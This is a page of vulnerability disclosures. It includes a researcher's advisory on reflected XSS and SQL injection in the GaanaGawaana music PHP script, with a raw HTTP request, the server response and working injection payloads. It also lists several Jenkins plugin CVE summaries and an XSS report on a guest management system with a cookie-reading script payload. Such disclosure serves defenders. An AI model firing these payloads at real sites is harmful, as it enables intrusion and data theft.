GaanaGawaana Music Platform PHP Script version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

    ## Title: GaanaGawaana - Music Platform PHP Script-1.0 XSS-Reflectedand SQLi Vulnerability## Author: nu11secur1ty## Date: 05.16.2023## Vendor: https://www.codester.com/## Software: https://www.codester.com/items/27270/gaanagawaana-music-platform-php-script## Reference XSS: https://portswigger.net/web-security/cross-site-scripting## Reference SQLi: https://portswigger.net/web-security/sql-injection## Description:XSS: The value of the q request parameter is copied into the HTMLdocument as text between TITLE tags. The payloadaw9rx</title><script>alert(1)</script>rg1m6 was submitted in the qparameter. This input was echoed unmodified in the application'sresponse.--------------------------------------------------------------------------------------------------------------------------------SQLi: The q parameter appears to be vulnerable to SQL injectionattacks. The payloads 70346811' or 7218=7218-- and 18028207' or8587=8593-- were each submitted in the q parameter. These two requestsresulted in different responses, indicating that the input is beingincorporated into a SQL query in an unsafe way.STATUS: CRITICAL Vulnerability[+]Exploit-XSS-test:```XSSGET /search?q=aw9rx%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3erg1m6 HTTP/2Host: gaanagawaana.codesler.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+]Response-XSS-test:```HTTP/2 200 OKCache-Control: no-store, max-age=0, no-cacheDate: Tue, 16 May 2023 06:39:12 GMTContent-Type: text/html; charset=UTF-8Server: Apache<html><head><title>aw9rx</title><script>alert(1)</script>rg1m6's Song Download,Listen & Lyrics</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">```--------------------------------------------------------------------[+]Payload-SQLi:```SQLi---Parameter: q (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: q=-5722%' OR 2476=2476 AND 'nMde%'='nMde---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/codester/2023/GaanaGawaana-Music-Platform-PHP-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/gaanagawaana-10-xss-reflected-sqli-for.html)## Time spend:01:10:00

GaanaGawaana Music Platform PHP Script 1.0 Cross Site Scripting / SQL Injection

Jenkins HashiCorp Vault Plugin 360.v0a_1c04cf807d and earlier does not properly mask (i.e., replace with asterisks) credentials in the build log when push mode for durable task logging is enabled.

CVE-2023-33001: Jenkins Security Advisory 2023-05-16

Jenkins WSO2 Oauth Plugin 1.0 and earlier does not invalidate the previous session on login.

CVE-2023-33005: Jenkins Security Advisory 2023-05-16

Jenkins SAML Single Sign On(SSO) Plugin 2.0.2 and earlier does not perform hostname validation when connecting to miniOrange or the configured IdP to retrieve SAML metadata, which could be abused using a man-in-the-middle attack to intercept these connections.

CVE-2023-32993: Jenkins Security Advisory 2023-05-16

Jenkins CAS Plugin 1.6.2 and earlier does not invalidate the previous session on login.

CVE-2023-32997: Jenkins Security Advisory 2023-05-16

A cross-site request forgery (CSRF) vulnerability in Jenkins WSO2 Oauth Plugin 1.0 and earlier allows attackers to trick users into logging in to the attacker's account.

CVE-2023-33006: Jenkins Security Advisory 2023-05-16

Jenkins TestComplete support Plugin 2.8.1 and earlier does not escape the TestComplete project name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2023-33002: Jenkins Security Advisory 2023-05-16

A missing permission check in Jenkins AppSpider Plugin 1.0.15 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.

CVE-2023-32999: Jenkins Security Advisory 2023-05-16

Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.149 and earlier does not mask credentials displayed on the configuration form, increasing the potential for attackers to observe and capture them.

CVE-2023-33000: Jenkins Security Advisory 2023-05-16

A vulnerability, which was classified as problematic, has been found in SourceCodester Guest Management System 1.0. Affected by this issue is some unknown functionality of the file dateTest.php of the component GET Parameter Handler. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229160.

Permalink

Cannot retrieve contributors at this time

**Guest Management System v1.0 has reflected cross-site scripting**

BUG\_Author: DRXYJ

Website source code address: https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html

Vulnerability File: /guestmanagement/dateTest.php

GET parameter "name" exists reflected cross-site scripting vulnerability

Payload: /guestmanagement/dateTest.php?name="><script>alert(document.cookie)</script>&name1=Submit

The js code is successfully executed and the cookie value is returned, which proves that there is a reflected cross-site scripting vulnerability.

Tag

#xss